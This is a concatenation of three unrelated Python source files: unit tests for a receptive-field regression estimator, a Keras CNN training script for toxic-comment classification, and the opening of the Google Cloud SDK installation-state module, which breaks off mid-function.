assert_allclose(rf.coef_.T.ravel(), w, atol=1e-3)
# Make sure different input shapes work
rf.fit(X[:, np.newaxis:], y[:, np.newaxis])
rf.fit(X, y[:, np.newaxis])
with pytest.raises(ValueError, match='If X has 3 .* y must have 2 or 3'):
rf.fit(X[..., np.newaxis], y)
with pytest.raises(ValueError, match='X must be shape'):
rf.fit(X[:, 0], y)
with pytest.raises(ValueError, match='X and y do not have the same n_epo'):
rf.fit(X[:, np.newaxis], np.tile(y[:, np.newaxis, np.newaxis],
[1, 2, 1]))
with pytest.raises(ValueError, match='X and y do not have the same n_tim'):
rf.fit(X, y[:-2])
with pytest.raises(ValueError, match='n_features in X does not match'):
rf.fit(X[:, :1], y)
# auto-naming features
feature_names = ['feature_%s' % ii for ii in [0, 1, 2]]
rf = ReceptiveField(tmin, tmax, 1, estimator=mod,
feature_names=feature_names)
assert_equal(rf.feature_names, feature_names)
rf = ReceptiveField(tmin, tmax, 1, estimator=mod)
rf.fit(X, y)
assert_equal(rf.feature_names, None)
# Float becomes ridge
rf = ReceptiveField(tmin, tmax, 1, ['one', 'two', 'three'], estimator=0)
str(rf) # repr works before fit
rf.fit(X, y)
assert isinstance(rf.estimator_, TimeDelayingRidge)
str(rf) # repr works after fit
rf = ReceptiveField(tmin, tmax, 1, ['one'], estimator=0)
rf.fit(X[:, [0]], y)
str(rf) # repr with one feature
# Should only accept estimators or floats
with pytest.raises(ValueError, match='`estimator` must be a float or'):
ReceptiveField(tmin, tmax, 1, estimator='foo').fit(X, y)
with pytest.raises(ValueError, match='`estimator` must be a float or'):
ReceptiveField(tmin, tmax, 1, estimator=np.array([1, 2, 3])).fit(X, y)
with pytest.raises(ValueError, match='tmin .* must be at most tmax'):
ReceptiveField(5, 4, 1).fit(X, y)
# scorers
for key, val in _SCORERS.items():
rf = ReceptiveField(tmin, tmax, 1, ['one'],
estimator=0, scoring=key, patterns=True)
rf.fit(X[:, [0]], y)
y_pred = rf.predict(X[:, [0]]).T.ravel()[:, np.newaxis]
assert_allclose(val(y[:, np.newaxis], y_pred,
multioutput='raw_values'),
rf.score(X[:, [0]], y), rtol=1e-2)
with pytest.raises(ValueError, match='inputs must be shape'):
_SCORERS['corrcoef'](y.ravel(), y_pred, multioutput='raw_values')
# Need correct scorers
with pytest.raises(ValueError, match='scoring must be one of'):
ReceptiveField(tmin, tmax, 1., scoring='foo').fit(X, y)
@pytest.mark.parametrize('n_jobs', n_jobs_test)
def test_time_delaying_fast_calc(n_jobs):
"""Test time delaying and fast calculations."""
X = np.array([[1, 2, 3], [5, 7, 11]]).T
# all negative
smin, smax = 1, 2
X_del = _delay_time_series(X, smin, smax, 1.)
# (n_times, n_features, n_delays) -> (n_times, n_features * n_delays)
X_del.shape = (X.shape[0], -1)
expected = np.array([[0, 1, 2], [0, 0, 1], [0, 5, 7], [0, 0, 5]]).T
assert_allclose(X_del, expected)
Xt_X = np.dot(X_del.T, X_del)
expected = [[5, 2, 19, 10], [2, 1, 7, 5], [19, 7, 74, 35], [10, 5, 35, 25]]
assert_allclose(Xt_X, expected)
x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
assert_allclose(x_xt, expected)
# all positive
smin, smax = -2, -1
X_del = _delay_time_series(X, smin, smax, 1.)
X_del.shape = (X.shape[0], -1)
expected = np.array([[3, 0, 0], [2, 3, 0], [11, 0, 0], [7, 11, 0]]).T
assert_allclose(X_del, expected)
Xt_X = np.dot(X_del.T, X_del)
expected = [[9, 6, 33, 21], [6, 13, 22, 47],
[33, 22, 121, 77], [21, 47, 77, 170]]
assert_allclose(Xt_X, expected)
x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
assert_allclose(x_xt, expected)
# both sides
smin, smax = -1, 1
X_del = _delay_time_series(X, smin, smax, 1.)
X_del.shape = (X.shape[0], -1)
expected = np.array([[2, 3, 0], [1, 2, 3], [0, 1, 2],
[7, 11, 0], [5, 7, 11], [0, 5, 7]]).T
assert_allclose(X_del, expected)
Xt_X = np.dot(X_del.T, X_del)
expected = [[13, 8, 3, 47, 31, 15],
[8, 14, 8, 29, 52, 31],
[3, 8, 5, 11, 29, 19],
[47, 29, 11, 170, 112, 55],
[31, 52, 29, 112, 195, 112],
[15, 31, 19, 55, 112, 74]]
assert_allclose(Xt_X, expected)
x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
assert_allclose(x_xt, expected)
# slightly harder to get the non-Toeplitz correction correct
X = np.array([[1, 2, 3, 5]]).T
smin, smax = 0, 3
X_del = _delay_time_series(X, smin, smax, 1.)
X_del.shape = (X.shape[0], -1)
expected = np.array([[1, 2, 3, 5], [0, 1, 2, 3],
[0, 0, 1, 2], [0, 0, 0, 1]]).T
assert_allclose(X_del, expected)
Xt_X = np.dot(X_del.T, X_del)
expected = [[39, 23, 13, 5], [23, 14, 8, 3], [13, 8, 5, 2], [5, 3, 2, 1]]
assert_allclose(Xt_X, expected)
x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
assert_allclose(x_xt, expected)
# even worse
X = np.array([[1, 2, 3], [5, 7, 11]]).T
smin, smax = 0, 2
X_del = _delay_time_series(X, smin, smax, 1.)
X_del.shape = (X.shape[0], -1)
expected = np.array([[1, 2, 3], [0, 1, 2], [0, 0, 1],
[5, 7, 11], [0, 5, 7], [0, 0, 5]]).T
assert_allclose(X_del, expected)
Xt_X = np.dot(X_del.T, X_del)
expected = np.array([[14, 8, 3, 52, 31, 15],
[8, 5, 2, 29, 19, 10],
[3, 2, 1, 11, 7, 5],
[52, 29, 11, 195, 112, 55],
[31, 19, 7, 112, 74, 35],
[15, 10, 5, 55, 35, 25]])
assert_allclose(Xt_X, expected)
x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
assert_allclose(x_xt, expected)
# And a bunch of random ones for good measure
rng = np.random.RandomState(0)
X = rng.randn(25, 3)
y = np.empty((25, 2))
vals = (0, -1, 1, -2, 2, -11, 11)
for smax in vals:
for smin in vals:
if smin > smax:
continue
for ii in range(X.shape[1]):
kernel = rng.randn(smax - smin + 1)
kernel -= np.mean(kernel)
y[:, ii % y.shape[-1]] = np.convolve(X[:, ii], kernel, 'same')
x_xt, x_yt, n_ch_x, _, _ = _compute_corrs(X, y, smin, smax + 1)
X_del = _delay_time_series(X, smin, smax, 1., fill_mean=False)
x_yt_true = einsum('tfd,to->ofd', X_del, y)
x_yt_true = np.reshape(x_yt_true, (x_yt_true.shape[0], -1)).T
assert_allclose(x_yt, x_yt_true, atol=1e-7, err_msg=(smin, smax))
X_del.shape = (X.shape[0], -1)
x_xt_true = np.dot(X_del.T, X_del).T
assert_allclose(x_xt, x_xt_true, atol=1e-7, err_msg=(smin, smax))
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_1d(n_jobs):
"""Test that the fast solving works like Ridge."""
from sklearn.linear_model import Ridge
rng = np.random.RandomState(0)
x = rng.randn(500, 1)
for delay in range(-2, 3):
y = np.zeros(500)
slims = [(-2, 4)]
if delay == 0:
y[:] = x[:, 0]
elif delay < 0:
y[:delay] = x[-delay:, 0]
slims += [(-4, -1)]
else:
y[delay:] = x[:-delay, 0]
slims += [(1, 2)]
for ndim in (1, 2):
y.shape = (y.shape[0],) + (1,) * (ndim - 1)
for slim in slims:
smin, smax = slim
lap = TimeDelayingRidge(smin, smax, 1., 0.1, 'laplacian',
fit_intercept=False, n_jobs=n_jobs)
for estimator in (Ridge(alpha=0.), Ridge(alpha=0.1), 0., 0.1,
lap):
for offset in (-100, 0, 100):
model = ReceptiveField(smin, smax, 1.,
estimator=estimator,
n_jobs=n_jobs)
use_x = x + offset
model.fit(use_x, y)
if estimator is lap:
continue # these checks are too stringent
assert_allclose(model.estimator_.intercept_, -offset,
atol=1e-1)
assert_array_equal(model.delays_,
np.arange(smin, smax + 1))
expected = (model.delays_ == delay).astype(float)
expected = expected[np.newaxis] # features
if y.ndim == 2:
expected = expected[np.newaxis] # outputs
assert_equal(model.coef_.ndim, ndim + 1)
assert_allclose(model.coef_, expected, atol=1e-3)
start = model.valid_samples_.start or 0
stop = len(use_x) - (model.valid_samples_.stop or 0)
assert stop - start >= 495
assert_allclose(
model.predict(use_x)[model.valid_samples_],
y[model.valid_samples_], atol=1e-2)
score = np.mean(model.score(use_x, y))
assert score > 0.9999
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_nd(n_jobs):
"""Test multidimensional support."""
from sklearn.linear_model import Ridge
# multidimensional
rng = np.random.RandomState(3)
x = rng.randn(1000, 3)
y = np.zeros((1000, 2))
smin, smax = 0, 5
# This is a weird assignment, but it's just a way to distribute some
# unique values at various delays, and "expected" explains how they
# should appear in the resulting RF
for ii in range(1, 5):
y[ii:, ii % 2] += (-1) ** ii * ii * x[:-ii, ii % 3]
y -= np.mean(y, axis=0)
x -= np.mean(x, axis=0)
x_off = x + 1e3
expected = [
[[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 4, 0],
[0, 0, 2, 0, 0, 0]],
[[0, 0, 0, -3, 0, 0],
[0, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
]
tdr_l = TimeDelayingRidge(smin, smax, 1., 0.1, 'laplacian', n_jobs=n_jobs)
tdr_nc = TimeDelayingRidge(smin, smax, 1., 0.1, n_jobs=n_jobs,
edge_correction=False)
for estimator, atol in zip((Ridge(alpha=0.), 0., 0.01, tdr_l, tdr_nc),
(1e-3, 1e-3, 1e-3, 5e-3, 5e-2)):
model = ReceptiveField(smin, smax, 1.,
estimator=estimator)
model.fit(x, y)
assert_array_equal(model.delays_,
np.arange(smin, smax + 1))
assert_allclose(model.coef_, expected, atol=atol)
tdr = TimeDelayingRidge(smin, smax, 1., 0.01, reg_type='foo',
n_jobs=n_jobs)
model = ReceptiveField(smin, smax, 1., estimator=tdr)
with pytest.raises(ValueError, match='reg_type entries must be one of'):
model.fit(x, y)
tdr = TimeDelayingRidge(smin, smax, 1., 0.01, reg_type=['laplacian'],
n_jobs=n_jobs)
model = ReceptiveField(smin, smax, 1., estimator=tdr)
with pytest.raises(ValueError, match='reg_type must have two elements'):
model.fit(x, y)
model = ReceptiveField(smin, smax, 1, estimator=tdr, fit_intercept=False)
with pytest.raises(ValueError, match='fit_intercept'):
model.fit(x, y)
# Now check the intercept_
tdr = TimeDelayingRidge(smin, smax, 1., 0., n_jobs=n_jobs)
tdr_no = TimeDelayingRidge(smin, smax, 1., 0., fit_intercept=False,
n_jobs=n_jobs)
for estimator in (Ridge(alpha=0.), tdr,
Ridge(alpha=0., fit_intercept=False), tdr_no):
# first with no intercept in the data
model = ReceptiveField(smin, smax, 1., estimator=estimator)
model.fit(x, y)
assert_allclose(model.estimator_.intercept_, 0., atol=1e-7,
err_msg=repr(estimator))
assert_allclose(model.coef_, expected, atol=1e-3,
err_msg=repr(estimator))
y_pred = model.predict(x)
assert_allclose(y_pred[model.valid_samples_],
y[model.valid_samples_],
atol=1e-2, err_msg=repr(estimator))
score = np.mean(model.score(x, y))
assert score > 0.9999
# now with an intercept in the data
model.fit(x_off, y)
if estimator.fit_intercept:
val = [-6000, 4000]
itol = 0.5
ctol = 5e-4
else:
val = itol = 0.
ctol = 2.
assert_allclose(model.estimator_.intercept_, val, atol=itol,
err_msg=repr(estimator))
assert_allclose(model.coef_, expected, atol=ctol, rtol=ctol,
err_msg=repr(estimator))
if estimator.fit_intercept:
ptol = 1e-2
stol = 0.999999
else:
ptol = 10
stol = 0.6
y_pred = model.predict(x_off)[model.valid_samples_]
assert_allclose(y_pred, y[model.valid_samples_],
atol=ptol, err_msg=repr(estimator))
score = np.mean(model.score(x_off, y))
assert score > stol, estimator
model = ReceptiveField(smin, smax, 1., fit_intercept=False)
model.fit(x_off, y)
assert_allclose(model.estimator_.intercept_, 0., atol=1e-7)
score = np.mean(model.score(x_off, y))
assert score > 0.6
def _make_data(n_feats, n_targets, n_samples, tmin, tmax):
rng = np.random.RandomState(0)
X = rng.randn(n_samples, n_feats)
w = rng.randn(int((tmax - tmin) + 1) * n_feats, n_targets)
# Delay inputs
X_del = np.concatenate(
_delay_time_series(X, tmin, tmax, 1.).transpose(2, 0, 1), axis=1)
y = np.dot(X_del, w)
return X, y
@requires_sklearn
def test_inverse_coef():
"""Test inverse coefficients computation."""
from sklearn.linear_model import Ridge
tmin, tmax = 0., 10.
n_feats, n_targets, n_samples = 3, 2, 1000
n_delays = int((tmax - tmin) + 1)
# Check coefficient dims, for all estimator types
X, y = _make_data(n_feats, n_targets, n_samples, tmin, tmax)
tdr = TimeDelayingRidge(tmin, tmax, 1., 0.1, 'laplacian')
for estimator in (0., 0.01, Ridge(alpha=0.), tdr):
rf = ReceptiveField(tmin, tmax, 1., estimator=estimator,
patterns=True)
rf.fit(X, y)
inv_rf = ReceptiveField(tmin, tmax, 1., estimator=estimator,
patterns=True)
inv_rf.fit(y, X)
assert_array_equal(rf.coef_.shape, rf.patterns_.shape,
(n_targets, n_feats, n_delays))
assert_array_equal(inv_rf.coef_.shape, inv_rf.patterns_.shape,
(n_feats, n_targets, n_delays))
# we should have np.dot(patterns.T,coef) ~ np.eye(n)
c0 = rf.coef_.reshape(n_targets, n_feats * n_delays)
c1 = rf.patterns_.reshape(n_targets, n_feats * n_delays)
assert_allclose(np.dot(c0, c1.T), np.eye(c0.shape[0]), atol=0.2)
@requires_sklearn
def test_linalg_warning():
"""Test that warnings are issued when no regularization is applied."""
from sklearn.linear_model import Ridge
n_feats, n_targets, n_samples = 5, 60, 50
X, y = _make_data(n_feats, n_targets, n_samples, tmin, tmax)
for estimator in (0., Ridge(alpha=0.)):
rf = ReceptiveField(tmin, tmax, 1., estimator=estimator)
with pytest.warns((RuntimeWarning, UserWarning),
match='[Singular|scipy.linalg.solve]'):
rf.fit(y, X)
run_tests_if_main()
| |
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import os
import re
import csv
import math
import codecs
import keras
from keras import optimizers
from keras import backend as K
from keras import regularizers
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, Flatten
from keras.layers import Embedding, Conv1D, MaxPooling1D, GlobalMaxPooling1D
from keras.utils import np_utils
from keras.utils import plot_model
from keras.models import load_model
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
from keras.callbacks import LearningRateScheduler
from keras.callbacks import EarlyStopping
from tqdm import tqdm
from nltk.corpus import stopwords
from nltk.tokenize import RegexpTokenizer
sns.set_style("whitegrid")
SAVE_PATH = '/data/vision/fisher/data1/kaggle/toxic/'
DATA_PATH = '/data/vision/fisher/data1/kaggle/toxic/data/'
MAX_NB_WORDS = 100000
#EMBEDDING_DIR = '/data/vision/fisher/data1/Glove/'
EMBEDDING_DIR = '/data/vision/fisher/data1/FastText/'
np.random.seed(0)
tokenizer = RegexpTokenizer(r'\w+')
stop_words = set(stopwords.words('english'))
stop_words.update(['.', ',', '"', "'", ':', ';', '(', ')', '[', ']', '{', '}'])
def step_decay(epoch):
lr_init = 0.001
drop = 0.5
epochs_drop = 4.0
lr_new = lr_init * math.pow(drop, math.floor((1+epoch)/epochs_drop))
return lr_new
class LR_hist(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.losses = []
self.lr = []
def on_epoch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
self.lr.append(step_decay(len(self.losses)))
#load embeddings
print 'loading word embeddings...'
"""
embeddings_index = {}
f = codecs.open(os.path.join(EMBEDDING_DIR, 'glove.6B.300d.txt'), encoding='utf-8')
for line in tqdm(f):
values = line.split(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
print('found %s word vectors' % len(embeddings_index))
"""
embeddings_index = {}
f = codecs.open(os.path.join(EMBEDDING_DIR, 'wiki.en.vec'), encoding='utf-8')
for line in tqdm(f):
values = line.rstrip().rsplit(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
print('found %s word vectors' % len(embeddings_index))
#load data
train_df = pd.read_csv(DATA_PATH + '/train.csv', sep=',', header=0)
test_df = pd.read_csv(DATA_PATH + '/test.csv', sep=',', header=0)
test_df = test_df.fillna('_NA_')
print "num train: ", train_df.shape[0]
print "num test: ", test_df.shape[0]
label_names = filter(lambda x: x not in ['id', 'comment_text'], train_df.columns.tolist())
y_train = train_df[label_names].values
#visualize word distribution
train_df['doc_len'] = train_df['comment_text'].apply(lambda words: len(words.split(" ")))
max_seq_len = np.round(train_df['doc_len'].mean() + train_df['doc_len'].std()).astype(int)
sns.distplot(train_df['doc_len'], hist=True, kde=True, color='b', label='doc len')
plt.axvline(x=max_seq_len, color='k', linestyle='--', label='max len')
plt.title('comment length'); plt.legend()
plt.savefig('./figures/comment_length_hist.png')
raw_docs_train = train_df['comment_text'].tolist()
raw_docs_test = test_df['comment_text'].tolist()
num_classes = len(label_names)
print "pre-processing train data..."
processed_docs_train = []
for doc in tqdm(raw_docs_train):
tokens = tokenizer.tokenize(doc)
filtered = [word for word in tokens if word not in stop_words]
processed_docs_train.append(" ".join(filtered))
#end for
processed_docs_test = []
for doc in tqdm(raw_docs_test):
tokens = tokenizer.tokenize(doc)
filtered = [word for word in tokens if word not in stop_words]
processed_docs_test.append(" ".join(filtered))
#end for
print "tokenizing input data..."
tokenizer = Tokenizer(num_words=MAX_NB_WORDS, lower=True, char_level=False)
tokenizer.fit_on_texts(processed_docs_train + processed_docs_test)
word_seq_train = tokenizer.texts_to_sequences(processed_docs_train)
word_seq_test = tokenizer.texts_to_sequences(processed_docs_test)
word_index = tokenizer.word_index
print "dictionary size: ", len(word_index)
#pad sequences
word_seq_train = sequence.pad_sequences(word_seq_train, maxlen=max_seq_len)
word_seq_test = sequence.pad_sequences(word_seq_test, maxlen=max_seq_len)
#training params
batch_size = 256
num_epochs = 16
#model parameters
num_filters = 64
embed_dim = 300
weight_decay = 1e-4
#embedding matrix
print 'preparing embedding matrix...'
words_not_found = []
nb_words = min(MAX_NB_WORDS, len(word_index))
embedding_matrix = np.zeros((nb_words, embed_dim))
for word, i in word_index.items():
if i >= nb_words:
continue
embedding_vector = embeddings_index.get(word)
if (embedding_vector is not None) and len(embedding_vector) > 0:
# words not found in embedding index will be all-zeros.
embedding_matrix[i] = embedding_vector
else:
words_not_found.append(word)
print 'number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0)
#CNN architecture
print "training CNN ..."
model = Sequential()
model.add(Embedding(nb_words, embed_dim,
weights=[embedding_matrix], input_length=max_seq_len, trainable=False))
model.add(Conv1D(num_filters, 7, activation='relu', padding='same'))
model.add(MaxPooling1D(2))
model.add(Conv1D(num_filters, 7, activation='relu', padding='same'))
model.add(GlobalMaxPooling1D())
model.add(Dropout(0.5))
model.add(Dense(32, activation='relu', kernel_regularizer=regularizers.l2(weight_decay)))
model.add(Dense(num_classes, activation='sigmoid')) #multi-label (k-hot encoding)
adam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])
model.summary()
#define callbacks
file_name = SAVE_PATH + 'cnn-weights-checkpoint.h5'
checkpoint = ModelCheckpoint(file_name, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
#tensor_board = TensorBoard(log_dir='./logs', write_graph=True)
hist_lr = LR_hist()
reduce_lr = LearningRateScheduler(step_decay)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=16, verbose=1)
callbacks_list = [checkpoint, hist_lr, reduce_lr, early_stopping]
#model training
hist = model.fit(word_seq_train, y_train, batch_size=batch_size, epochs=num_epochs, callbacks=callbacks_list, validation_split=0.1, shuffle=True, verbose=2)
model.save(SAVE_PATH + 'cnn_final_model.h5', overwrite=True)
model.save_weights(SAVE_PATH + 'cnn_final_weights.h5',overwrite=True)
#load saved model
#model = load_model(SAVE_PATH + 'final_model.h5')
y_test = model.predict(word_seq_test)
#create a submission
submission_df = pd.DataFrame(columns=['id'] + label_names)
submission_df['id'] = test_df['id'].values
submission_df[label_names] = y_test
submission_df.to_csv("./data/toxic_submission_second.csv", index=False)
#generate plots
plt.figure()
plt.plot(hist.history['loss'], lw=2.0, color='b', label='train')
plt.plot(hist.history['val_loss'], lw=2.0, color='r', label='val')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Cross-Entropy Loss')
plt.legend(loc='upper right')
plt.savefig('./figures/cnn_sentiment_loss.png')
plt.figure()
plt.plot(hist.history['acc'], lw=2.0, color='b', label='train')
plt.plot(hist.history['val_acc'], lw=2.0, color='r', label='val')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.savefig('./figures/cnn_sentiment_acc.png')
plt.figure()
plt.plot(hist_lr.lr, lw=2.0, label='learning rate')
plt.title('CNN sentiment')
plt.xlabel('Epochs')
plt.ylabel('Learning Rate')
plt.legend()
plt.savefig('./figures/cnn_sentiment_learning_rate.png')
plot_model(model, show_shapes=True, to_file='./figures/cnn_sentiment_model.png')
| |
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages the state of what is installed in the cloud SDK.
This tracks the installed modules along with the files they created. It also
provides functionality like extracting tar files into the installation and
tracking when we check for updates.
"""
import compileall
import errno
import logging
import os
import shutil
import sys
from googlecloudsdk.core import config
from googlecloudsdk.core import exceptions
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.updater import installers
from googlecloudsdk.core.updater import snapshots
from googlecloudsdk.core.util import files as file_utils
class Error(exceptions.Error):
"""Base exception for the local_state module."""
pass
class InvalidSDKRootError(Error):
"""Error for when the root of the Cloud SDK is invalid or cannot be found."""
def __init__(self):
super(InvalidSDKRootError, self).__init__(
'The components management action could not be performed because the '
'installation root of the Cloud SDK could not be located. '
'If you previously used the Cloud SDK installer, '
'you could re-install the the SDK and retry again.')
class InvalidDownloadError(Error):
"""Exception for when the SDK that was download was invalid."""
def __init__(self):
super(InvalidDownloadError, self).__init__(
'The Cloud SDK download was invalid.')
class PermissionsError(Error):
"""Error for when a file operation cannot complete due to permissions."""
def __init__(self, message, path):
"""Initialize a PermissionsError.
Args:
message: str, The message from the underlying error.
path: str, The absolute path to a file or directory that needs to be
operated on, but can't because of insufficient permissions.
"""
super(PermissionsError, self).__init__(
'{message}: [{path}]\n\nEnsure you have the permissions to access the '
'file and that the file is not in use.'
.format(message=message, path=path))
def _RaisesPermissionsError(func):
"""Use this decorator for functions that deal with files.
If an exception indicating file permissions is raised, this decorator will
raise a PermissionsError instead, so that the caller only has to watch for
one type of exception.
Args:
func: The function to decorate.
Returns:
A decorator.
"""
def _TryFunc(*args, **kwargs):
try:
return func(*args, **kwargs)
except (OSError, IOError) as e:
if e.errno == errno.EACCES:
new_exc = PermissionsError(
message=e.strerror, path=os.path.abspath(e.filename))
# Maintain original stack trace.
raise new_exc, None, sys.exc_info()[2]
raise
except shutil.Error as e:
args = e.args[0][0]
# unfortunately shutil.Error *only* has formatted strings to inspect.
# Looking for this substring is looking for errno.EACCES, which has
# a numeric value of 13.
if args[2].startswith('[Errno 13]'):
new_exc = PermissionsError(
message=args[2], path=os.path.abspath(args[0]))
# Maintain original stack trace.
raise new_exc, None, sys.exc_info()[2]
raise
return _TryFunc
class InstallationState(object):
"""The main class for checking / updating local installation state."""
STATE_DIR_NAME = config.Paths.CLOUDSDK_STATE_DIR
BACKUP_DIR_NAME = '.backup'
TRASH_DIR_NAME = '.trash'
STAGING_ROOT_SUFFIX = '.staging'
COMPONENT_SNAPSHOT_FILE_SUFFIX = '.snapshot.json'
@staticmethod
def ForCurrent():
"""Gets the installation state for the SDK that this code is running in.
Returns:
InstallationState, The state for this area.
Raises:
InvalidSDKRootError: If this code is not running under a valid SDK.
"""
sdk_root = config.Paths().sdk_root
if not sdk_root:
raise InvalidSDKRootError()
return InstallationState(os.path.realpath(sdk_root))
def BackupInstallationState(self):
"""Gets the installation state for the backup of this state, if it exists.
Returns:
InstallationState, The state for this area or None if the backup does not
exist.
"""
if not self.HasBackup():
return None
return InstallationState(os.path.realpath(self.__backup_directory))
@staticmethod
def VersionForInstalledComponent(component_id):
"""Gets the version string for the given installed component.
This function is to be used to get component versions for metrics reporting.
If it fails in any way or if the component_id is unknown, it will return
None. This prevents errors from surfacing when the version is needed
strictly for reporting purposes.
Args:
component_id: str, The component id of the component you want the version
for.
Returns:
str, The installed version of the component, or None if it is not
installed or if an error occurs.
"""
try:
state = InstallationState.ForCurrent()
# pylint: disable=protected-access, This is the same class.
return InstallationManifest(
state._state_directory, component_id).VersionString()
# pylint: disable=bare-except, We never want to fail because of metrics.
except:
logging.debug('Failed to get installed version for component [%s]: [%s]',
component_id, sys.exc_info())
return None
@_RaisesPermissionsError
def __init__(self, sdk_root):
"""Initializes the installation state for the given sdk install.
Args:
sdk_root: str, The file path of the root of the SDK installation.
Raises:
ValueError: If the given SDK root does not exist.
"""
if not os.path.isdir(sdk_root):
raise ValueError('The given Cloud SDK root does not exist: [{0}]'
.format(sdk_root))
self.__sdk_root = sdk_root
self._state_directory = os.path.join(sdk_root,
InstallationState.STATE_DIR_NAME)
self.__backup_directory = os.path.join(self._state_directory,
InstallationState.BACKUP_DIR_NAME)
self.__trash_directory = os.path.join(self._state_directory,
InstallationState.TRASH_DIR_NAME)
self.__sdk_staging_root = (os.path.normpath(self.__sdk_root) +
InstallationState.STAGING_ROOT_SUFFIX)
@_RaisesPermissionsError
def _CreateStateDir(self):
"""Creates the state directory if it does not exist."""
if not os.path.isdir(self._state_directory):
file_utils.MakeDir(self._state_directory)
@property
def sdk_root(self):
"""Gets the root of the SDK that this state corresponds to.
Returns:
str, the path to the root directory.
"""
return self.__sdk_root
def _FilesForSuffix(self, suffix):
"""Returns the files in the state directory that have the given suffix.
Args:
suffix: str, The file suffix to match on.
Returns:
list of str, The file names that match.
"""
if not os.path.isdir(self._state_directory):
return []
files = os.listdir(self._state_directory)
matching = [f for f in files
if os.path.isfile(os.path.join(self._state_directory, f))
and f.endswith(suffix)]
return matching
@_RaisesPermissionsError
def InstalledComponents(self):
"""Gets all the components that are currently installed.
Returns:
A dictionary of component id string to InstallationManifest.
"""
snapshot_files = self._FilesForSuffix(
InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)
manifests = {}
for f in snapshot_files:
component_id = f[:-len(InstallationState.COMPONENT_SNAPSHOT_FILE_SUFFIX)]
manifests[component_id] = InstallationManifest(self._state_directory,
component_id)
return manifests
@_RaisesPermissionsError
def Snapshot(self):
"""Generates a ComponentSnapshot from the currently installed components."""
return snapshots.ComponentSnapshot.FromInstallState(self)
def DiffCurrentState(self, latest_snapshot, platform_filter=None):
"""Generates a ComponentSnapshotDiff from current state and the given state.
Args:
latest_snapshot: snapshots.ComponentSnapshot, The current state of the
world to diff against.
platform_filter: platforms.Platform, A platform that components must
match in order to be considered for any operations.
Returns:
A ComponentSnapshotDiff.
"""
return self.Snapshot().CreateDiff(latest_snapshot,
platform_filter=platform_filter)
@_RaisesPermissionsError
def CloneToStaging(self, progress_callback=None):
"""Clones this state to the temporary staging area.
This is used for making temporary copies of the entire Cloud SDK
installation when doing updates. The entire installation is cloned, but
doing so removes any backups and trash from this state before doing the
copy.
Args:
progress_callback: f(float), A function to call with the fraction of
completeness.
Returns:
An InstallationState object for the cloned install.
"""
self._CreateStateDir()
(rm_staging_cb, rm_backup_cb, rm_trash_cb, copy_cb) = (
console_io.ProgressBar.SplitProgressBar(progress_callback,
[1, 1, 1, 7]))
self._ClearStaging(progress_callback=rm_staging_cb)
self.ClearBackup(progress_callback=rm_backup_cb)
self.ClearTrash(progress_callback=rm_trash_cb)
class Counter(object):
def __init__(self, progress_callback, total):
self.count = 0
self.progress_callback = progress_callback
self.total = float(total)
# This function must match the signature that shutil expects for the
# ignore function.
def Tick(self, *unused_args):
self.count += 1
self.progress_callback(self.count / self.total)
return []
if progress_callback:
# This takes a little time, so only do it if we are going to report
# progress.
dirs = set()
for _, manifest in self.InstalledComponents().iteritems():
dirs.update(manifest.InstalledDirectories())
# There is always the root directory itself and the .install directory.
# In general, there could be in the SDK (if people just put stuff in there
# but this is fine for an estimate. The progress bar will at worst stay
# at 100% for slightly longer.
total_dirs = len(dirs) + 2
ticker = Counter(copy_cb, total_dirs).Tick if total_dirs else None
else:
ticker = None
shutil.copytree(self.__sdk_root, self.__sdk_staging_root, symlinks=True,
ignore=ticker)
staging_state = InstallationState(self.__sdk_staging_root)
# pylint: disable=protected-access, This is an instance of InstallationState
staging_state._CreateStateDir()
return staging_state
@_RaisesPermissionsError
def CreateStagingFromDownload(self, url, progress_callback=None):
"""Creates a new staging area from a fresh download of the Cloud SDK.
Args:
url: str, The url to download the new SDK from.
progress_callback: f(float), A function to call with the fraction of
completeness.
Returns:
An InstallationState object for the new install.
Raises:
installers.URLFetchError: If the new SDK could not be downloaded.
InvalidDownloadError: If the new SDK was malformed.
"""
self._ClearStaging()
with file_utils.TemporaryDirectory() as t:
download_dir = os.path.join(t, '.download')
extract_dir = os.path.join(t, '.extract')
installers.ComponentInstaller.DownloadAndExtractTar(
